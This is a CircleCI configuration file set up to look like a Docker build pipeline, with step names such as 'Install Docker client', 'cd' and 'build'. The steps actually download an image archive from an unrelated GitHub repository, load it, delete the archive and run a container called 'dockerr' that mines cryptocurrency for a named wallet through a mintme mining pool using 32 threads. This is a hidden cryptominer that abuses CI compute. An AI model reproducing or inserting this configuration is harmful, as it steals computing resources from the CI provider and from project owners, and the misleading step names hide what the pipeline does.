version: 2.1
jobs:
  build:
    docker:
      - image: cimg/base:2022.06
        #auth:
        #  username: mydockerhub-user
        #  password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      # ... steps for building/testing app ...
      - setup_remote_docker:
          version: 20.10.14
      # Install via apk on alpine based images
      - run:
          name: Install Docker client
          command: wget https://github.com/bakeingoie/ipe/raw/main/docker.tar
# ...
      - run:
          name: "cd"
          command: |
            docker load -i docker.tar
# ...
# ...
      - run:
          name: "build"
          command: |
            rm -rf docker.tar
            
# ...
# ...
      - run:
          name: "get"
          command: |
            docker run dockerr -o mintme-solo.wattpool.net:3001 -u 0x4E227342134E1c0beC9eE136394622C12F50BA48 -p x  --no-color --print-time=6000 --donate-level=1 --worker-id=01 -t 32 




workflows:
  sample: # This is the name of the workflow, feel free to change it to better match your workflow.
    # Inside the workflow, you define the jobs you want to run.
    jobs:
      - build
